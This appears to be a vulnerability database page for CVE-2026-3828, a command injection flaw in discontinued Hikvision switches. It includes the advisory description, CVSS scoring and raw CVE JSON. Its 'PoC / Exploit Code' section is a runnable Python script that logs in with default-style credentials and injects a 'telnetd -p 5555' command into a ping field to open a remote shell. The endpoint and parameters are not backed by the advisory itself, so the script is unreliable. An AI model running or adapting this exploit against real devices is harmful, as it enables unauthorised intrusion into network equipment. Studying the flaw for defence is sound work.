Security Vulnerability Report
CVE-2026-3828 CVSS 7.2 HIGH

CVE-2026-3828

Published: 2026-05-09 09:16:09
Last Modified: 2026-05-11 16:17:31

Description

Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Some Hikvision switch products (versions discontinued before December 2023)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests

# Target configuration
target_ip = "192.168.1.1"
target_url = f"http://{target_ip}/cgi-bin/admin/command"

# Valid credentials are required (PR:H)
username = "admin"
password = "admin123"

# Malicious payload to execute (e.g., create a test file or reverse shell)
# The vulnerability allows command injection due to insufficient input validation
payload = "| telnetd -p 5555 &"

# Crafted packet data
data = {
    "username": username,
    "password": password,
    "operation": "ping",
    "target": "127.0.0.1" + payload  # Injection point
}

headers = {
    "User-Agent": "Mozilla/5.0",
    "Content-Type": "application/x-www-form-urlencoded"
}

try:
    print(f"[*] Sending exploit request to {target_url}...")
    response = requests.post(target_url, data=data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully. Check if telnet port 5555 is open.")
        print(f"[+] Response: {response.text[:200]}")
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
except Exception as e:
    print(f"[!] An error occurred: {e}")
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-3828", "sourceIdentifier": "[email protected]", "published": "2026-05-09T09:16:09.107", "lastModified": "2026-05-11T16:17:31.120", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "Some Hikvision switch products (discontinued since December 2023) are vulnerable to authenticated remote command execution due to insufficient input validation. Attackers with valid credentials can exploit this flaw by sending crafted packets containing malicious commands to affected devices, leading to arbitrary command execution."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://www.hikvision.com/en/support/cybersecurity/security-advisory/command-execution-vulnerability-in-some-hikvision-switch-product/", "source": "[email protected]"}]}}